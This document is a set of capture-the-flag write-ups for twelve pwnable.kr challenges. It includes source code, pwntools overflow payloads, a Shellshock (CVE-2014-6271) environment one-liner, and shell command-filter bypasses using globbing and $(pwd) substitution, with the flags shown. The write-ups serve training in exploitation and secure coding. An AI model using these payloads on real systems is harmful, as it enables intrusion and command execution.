1.[fd]
solve
SSH to the server; there are three files: fd, fd.c and flag.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* File-scope input buffer; it has static storage, so it starts out zero-filled. */
char buf[32];
/*
 * fd challenge: prints the flag when the 32-byte read below yields "LETMEWIN\n".
 * The descriptor number passed to read() is computed from argv[1], so the caller
 * decides which already-open descriptor the program reads from.
 * NOTE(review): read() is used although <unistd.h> is not among the includes shown.
 */
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
// Caller-controlled: atoi() does no error reporting, and the result is used as a descriptor unchecked.
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
// The return value is stored but never inspected; on failure buf keeps its previous contents.
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
// "flag" is a relative path, resolved against the current working directory.
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
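The task is about getting the read() call to work.
Two functions matter: atoi() turns argv[1] into a number, and read() uses that number minus 0x1234 as its file descriptor.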
0x1235=4661
./fd 4661
LETMEWIN\n
flag
mommy! I think I know what a file descriptor is!!
2.collision
solve
from pwn import *
# NOTE(review): h is never assigned in this snippet; presumably it is the target
# hash constant from the challenge source, which this page does not show.
# k is five little-endian 32-bit words: one holding h - 4*0x01010101 and four
# holding 0x01010101, so the words add up to h.
# Defensive takeaway: a plain sum of words is a checksum, not a collision-resistant hash.
k=p32(h-0x01010101*4)+p32(0x01010101)*4
# The 20 bytes are passed to the local binary as argv[1].
p=process(['./col',k])
p.interactive()
flag
daddy! I just managed to create a hash collision :)
3.bof
solve
overflow
# encoding=utf-8
from pwn import *
# Remote challenge service as given by the author.
ip='pwnable.kr'
port=9000
p=remote(ip,port)
# 0x2c+0x8 = 52 filler bytes followed by 0xcafebabe packed as a little-endian 32-bit word.
# NOTE(review): the offsets come from the target's stack layout, which is not shown on this page.
# NOTE(review): str + p32(...) only concatenates on Python 2; on Python 3 p32() returns bytes.
# Defensive takeaway: the target copies input without a length bound, so a neighbouring
# stack value can be overwritten; bounded reads (fgets, length-checked read) close this.
payload='A'*(0x2c+0x8)+p32(0xcafebabe)
p.sendline(payload)
p.interactive()
4.flag
re
solve
UPX...? sounds like a delivery service :)
5.passcode
Use the name input to change the address of printf so that it points to system.
# Layout as written: 96 filler bytes, then the 4 bytes 00 a0 04 08 (0x0804a000 in
# little-endian order), a newline, then 0x80485e3 printed in decimal (134514147)
# and a final newline.
# NOTE(review): both addresses are specific to the challenge binary; its source and
# disassembly are not shown on this page, so they cannot be checked here.
payload = 'A'*96+'\x00\xa0\x04\x08'+'\n'+str(int(0x80485e3))+'\n'
flag
Sorry mom.. I got confused about scanf usage :(
6.random
The value is not really random; it is always 1804289383.
solve
3039230856
flag
Mommy, I thought libc random is unpredictable...
7.input
sourcecode
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
/*
 * input challenge: five checks on how the process was started (argv, descriptors 0
 * and 2, environment, a file in the working directory, a TCP connection). Every
 * failed check returns silently; passing all of them runs /bin/cat on "flag".
 * NOTE(review): read(), getenv() results and listen() are used without checking
 * their return values; see the per-stage notes.
 */
int main(int argc, char* argv[], char* envp[]){
printf("Welcome to pwnable.kr\n");
printf("Let's see if you know how to give input to program\n");
printf("Just give me correct inputs then you will get the flag :)\n");
// Stage 1 - argv: exactly 100 entries; 'A', 'B' index argv by character code (65, 66).
if(argc != 100) return 0;
// "\x00" is an empty C string, so argv[65] must be empty.
if(strcmp(argv['A'],"\x00")) return 0;
// argv[66] must be the three bytes 0x20 0x0a 0x0d.
if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
printf("Stage 1 clear!\n");
// Stage 2 - descriptors: 4 bytes are read from fd 0 and then from fd 2.
char buf[4];
// Return values of both read() calls are ignored; a short read leaves stale bytes in buf.
read(0, buf, 4);
if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
read(2, buf, 4);
if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
printf("Stage 2 clear!\n");
// Stage 3 - environment: variable named DE AD BE EF must hold CA FE BA BE.
// NOTE(review): getenv() returns NULL when the variable is unset, and that NULL is
// passed straight to strcmp().
if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
printf("Stage 3 clear!\n");
// Stage 4 - file: a file whose name is a single newline, relative to the working
// directory, must start with four zero bytes.
FILE* fp = fopen("\x0a", "r");
if(!fp) return 0;
// The two early returns below leave fp open.
if( fread(buf, 4, 1, fp)!=1 ) return 0;
if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
fclose(fp);
printf("Stage 4 clear!\n");
// Stage 5 - network: listen on the TCP port named in argv['C'] (argv[67]) and
// expect exactly the 4 bytes DE AD BE EF from the first client.
int sd, cd;
struct sockaddr_in saddr, caddr;
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd == -1){
printf("socket error, tell admin\n");
return 0;
}
// saddr is not zeroed first; only these three fields are assigned.
saddr.sin_family = AF_INET;
// INADDR_ANY: the listener accepts connections on every local interface.
saddr.sin_addr.s_addr = INADDR_ANY;
saddr.sin_port = htons( atoi(argv['C']) );
if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
printf("bind error, use another port\n");
return 1;
}
listen(sd, 1);
// An int is passed where accept() expects a socklen_t*, hence the cast.
int c = sizeof(struct sockaddr_in);
cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
if(cd < 0){
printf("accept error, tell admin\n");
return 0;
}
if( recv(cd, buf, 4, 0) != 4 ) return 0;
if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
printf("Stage 5 clear!\n");
// All stages passed. "flag" is a relative path, so it is resolved against the
// caller's working directory; sd and cd are never closed before returning.
system("/bin/cat flag");
return 0;
}
solve
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
/*
 * Driver for the input challenge: prepares argv, the environment, the "\n" file and
 * two pipes, then forks. The parent wires the pipes to descriptors 0 and 2 and
 * execve()s the target; the child writes the stage-2 bytes and, because its branch
 * has no exit, carries on to the stage-5 TCP connection at the bottom.
 * NOTE(review): ordering between the two processes relies on fixed sleep() delays,
 * and the results of write()/send()/dup2() are not checked.
 */
int main()
{
/* stage 1: 100 argv entries plus the terminating NULL */
char *argv[101] = {0};
for(int i = 1; i<100; ++i)
argv[i] = "a";
argv[0] = "/home/input2/input";
argv['A'] = "\x00";
argv['B'] = "\x20\x0a\x0d";
argv['C'] = "9999"; // port the target will listen on
argv[100] = NULL;
/* stage 3: a single NAME=VALUE entry made of raw bytes */
char *envp[2] = {"\xde\xad\xbe\xef=\xca\xfe\xba\xbe", NULL};
/* stage 4: the file must exist before execve(), otherwise the target's fopen fails */
FILE *fp = fopen("\x0a", "wb"); // "wb" and "w" behave the same on Linux; they differ on Windows
if(!fp) // the name is the single byte 0x0a; Windows text mode would turn 0x0a into 0x0d 0x0a
{
perror("Cannot open file.");
exit(1);
}
printf("open file success.\n");
fwrite("\x00\x00\x00\x00", 4, 1, fp);
fclose(fp);
/* stage 2: one pipe for the target's fd 0 and one for its fd 2 */
int pipe_stdin[2] = {-1, -1};
int pipe_stderr[2] = {-1, -1};
pid_t pid_child;
if ( pipe(pipe_stdin) < 0 || pipe(pipe_stderr) < 0 )
{
perror("Cannot create the pipe.");
exit(1);
}
#define STDIN_READ pipe_stdin[0]
#define STDIN_WRITE pipe_stdin[1]
#define STDERR_READ pipe_stderr[0]
#define STDERR_WRITE pipe_stderr[1]
if ( ( pid_child = fork() ) < 0 ) // the inner parentheses matter: '<' binds tighter than '='
{
perror("Cannot create fork child.");
exit(1);
}
if( pid_child == 0 )
{
/* child: feeds the pipes, then continues below to stage 5 */
sleep(1); // give the parent time to dup2() the read ends onto 0 and 2
close(STDIN_READ);
close(STDERR_READ);
write(STDIN_WRITE, "\x00\x0a\x00\xff", 4);
write(STDERR_WRITE, "\x00\x0a\x02\xff", 4);
}
else
{
/* parent: becomes the target program */
close(STDIN_WRITE);
close(STDERR_WRITE);
dup2(STDIN_READ, 0); // pipe read end becomes stdin
dup2(STDERR_READ, 2); // pipe read end becomes stderr
printf("start execve input.\n");
execve("/home/input2/input", argv, envp);
// Only reached when execve() fails; perror() writes to fd 2, which is now the pipe.
perror("Fail to execute the program");
exit(1);
}
// From here on only the child is running.
printf("pipe link.\n");
/* stage 5: connect to the target's listener on localhost */
sleep(2); // wait for the target to reach its accept()
int sockfd;
char buf[10] = {0}; // bytes to send
int len; // number of bytes in buf to send
struct sockaddr_in servaddr;
// servaddr is not zeroed first; only these three fields are assigned.
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(9999); // must match argv['C']
servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); // loopback
if( (sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket error.");
exit(1);
}
if ( connect(sockfd, (struct sockaddr*) &servaddr, sizeof(servaddr)) < 0 )
{
perror("connect error.");
exit(1);
}
printf("socket connect.\n");
// The four bytes contain no NUL, so strcpy/strlen give a length of 4.
strcpy(buf, "\xde\xad\xbe\xef");
len = strlen(buf);
send(sockfd, buf, len, 0);
close(sockfd);
return 0;
}
# The target runs system("/bin/cat flag") with a relative path, so a link named
# "flag" has to exist in the directory the driver is started from.
ln -s /home/input2/flag flag
# Presumably 1.c holds the driver program listed above; -g only adds debug info.
gcc 1.c -g
./a.out
flag
Mommy! I learned how to pass various input in Linux :)
8.leg
solve
key1=0x8cdc+8
key2=0x8d04+4
key3=0x8d80
flag
My daddy has a lot of ARMv5te muscle!
9.mistake
question
#include <stdio.h>
#include <fcntl.h>
#define PW_LEN 10
#define XORKEY 1
/*
 * XOR the first len bytes of s with XORKEY, in place.
 * The caller must make sure s has at least len writable bytes; nothing here
 * checks that, and a len of zero or less leaves s untouched.
 */
void xor(char* s, int len){
    int pos = 0;
    while (pos < len) {
        s[pos] = s[pos] ^ XORKEY;
        pos++;
    }
}
/*
 * mistake challenge: meant to compare a password read from a file with user input
 * XORed with XORKEY. Two conditions below assign the result of a comparison
 * instead of the call's return value, because '<' and '>' bind tighter than '='.
 * NOTE(review): sleep(), time(), read(), close(), scanf-related string functions
 * and system() are used with only <stdio.h> and <fcntl.h> included above.
 */
int main(int argc, char* argv[]){
int fd;
// Parsed as fd = (open(...) < 0). When open() succeeds the comparison is 0, so fd
// becomes 0 (stdin) and the descriptor open() returned is lost.
// Intended form: if((fd=open(...)) < 0). GCC's -Wparentheses reports this pattern.
if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){
printf("can't open password %d\n", fd);
return 0;
}
printf("do not bruteforce...\n");
// Delay of 0 to 19 seconds derived from the current time.
sleep(time(0)%20);
char pw_buf[PW_LEN+1];
int len;
// Same precedence issue: len = (read(...) > 0). With fd == 0 the "password" bytes
// are read from standard input, not from the password file.
if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
printf("read error\n");
close(fd);
return 0;
}
char pw_buf2[PW_LEN+1];
printf("input password : ");
// %10s stores at most 10 characters plus the terminator, which fits PW_LEN+1.
scanf("%10s", pw_buf2);
// XOR the second input; the length is the literal 10 rather than PW_LEN.
xor(pw_buf2, 10);
// Both sides of this comparison now come from the user, so it proves nothing
// about the stored password.
if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
printf("Password OK\n");
system("/bin/cat flag\n");
}
else{
printf("Wrong Password\n");
}
// fd holds 0 here, so this closes stdin rather than the password file.
close(fd);
return 0;
}
solve
open() returns a value >= 0 on success, so `open(...) < 0` evaluates to 0 and fd = (open(...) < 0) = 0, which is stdin.
payload
0000000000
1111111111
flag
Mommy, the operator priority always confuses me :(
10.shellshock
CVE-2014-6271
solve
# CVE-2014-6271: an affected bash imports a function definition from the environment
# variable x and also runs the text that follows the closing brace when it starts.
# Patched bash releases stop at the end of the function body; programs that run with
# extra privileges should not start a shell with a caller-controlled environment.
env x='() { :;}; /bin/cat flag' ./shellshock
flag
only if I knew CVE-2014-6271 ten years ago..!!
11.cmd1
question
#include <stdio.h>
#include <string.h>
/*
 * Count how many of the denied substrings ("flag", "sh", "tmp") occur in cmd.
 * Returns 0 when none is present, otherwise the number of distinct denied words
 * found. The check is a plain substring match on the text as given; it knows
 * nothing about what a shell will later expand that text into.
 * cmd must be a valid NUL-terminated string; NULL is not handled.
 */
int filter(char* cmd){
    static const char *const denied[] = { "flag", "sh", "tmp" };
    int hits = 0;
    size_t i;
    for (i = 0; i < sizeof denied / sizeof denied[0]; i++) {
        if (strstr(cmd, denied[i]) != NULL) {
            hits++;
        }
    }
    return hits;
}
/*
 * cmd1 challenge: runs argv[1] through the shell unless filter() finds a denied
 * substring in it.
 * NOTE(review): argc is never checked, so with no argument filter() and system()
 * receive a NULL pointer. putenv() is used although <stdlib.h> is not included above.
 */
int main(int argc, char* argv[], char** envp){
// PATH is replaced, so bare command names no longer resolve; absolute paths still do.
putenv("PATH=/thankyouverymuch");
// The filter sees the raw argument text only.
if(filter(argv[1])) return 0;
// system() hands the string to a shell, which performs globbing and other
// expansions after the filter has already run. A denylist on the raw text cannot
// cover that; running a fixed program with validated arguments (exec family, no
// shell) avoids the problem.
system( argv[1] );
return 0;
}
solve
# The argument contains none of the filtered words as literal text; the glob fl* is
# expanded later by the shell that system() starts. /bin/cat is given as an absolute
# path because cmd1 overwrites PATH.
./cmd1 "/bin/cat /home/cmd1/fl*"
flag
mommy now I get what PATH environment is for :)
12.cmd2
question
#include <stdio.h>
#include <string.h>
/*
 * Count how many of the denied substrings occur in cmd: "=", "PATH", "export",
 * "/", "`" and "flag". Returns 0 when none is present, otherwise the number of
 * distinct denied strings found. Matching is done on the literal text; characters
 * that a shell produces later through expansion are not seen here.
 * cmd must be a valid NUL-terminated string; NULL is not handled.
 */
int filter(char* cmd){
    static const char *const denied[] = {
        "=", "PATH", "export", "/", "`", "flag"
    };
    int hits = 0;
    size_t i;
    for (i = 0; i < sizeof denied / sizeof denied[0]; i++) {
        if (strstr(cmd, denied[i]) != NULL) {
            hits++;
        }
    }
    return hits;
}
extern char** environ;
/*
 * Blank the inherited environment: every "NAME=value" string reachable from
 * environ is overwritten with NUL bytes over its whole length. The pointer array
 * itself is left as it is, so each entry ends up as an empty string.
 */
void delete_env(){
    size_t idx = 0;
    while (environ[idx] != NULL) {
        char *entry = environ[idx];
        memset(entry, 0, strlen(entry));
        idx++;
    }
}
/*
 * cmd2 challenge: wipes the environment, sets a dummy PATH, then runs argv[1]
 * through the shell unless filter() finds a denied substring in it.
 * NOTE(review): argc is never checked, so with no argument filter(), printf("%s")
 * and system() receive a NULL pointer. putenv() is used although <stdlib.h> is not
 * included above.
 */
int main(int argc, char* argv[], char** envp){
// Blank every inherited environment string before anything else runs.
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
// The filter rejects a literal "/" among others, but only in the text as passed in.
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
// The shell started by system() still performs command substitution and other
// expansions, so characters the filter rejected can be produced after the check.
// Filtering the input of a shell is not a reliable boundary; executing a fixed
// program with validated arguments and no shell is.
system( argv[1] );
return 0;
}
solve
# Preparation in a scratch directory; these commands run in the login shell and
# never pass through cmd2's filter.
cd /tmp
mkdir xyzzpwn
cd xyzzpwn
echo "/bin/cat /home/cmd2/flag" >xyzz
chmod +x xyzz
# Working directory is set to / so that $(pwd) later expands to "/".
cd /
# Single quotes stop the login shell from expanding $(pwd). cmd2's filter therefore
# sees an argument without any "/", and the expansion only happens afterwards in the
# shell that system() starts.
/home/cmd2/cmd2 '$(pwd)tmp$(pwd)xyzzpwn$(pwd)xyzz'
flag
FuN_w1th_5h3ll_v4riabl3s_haha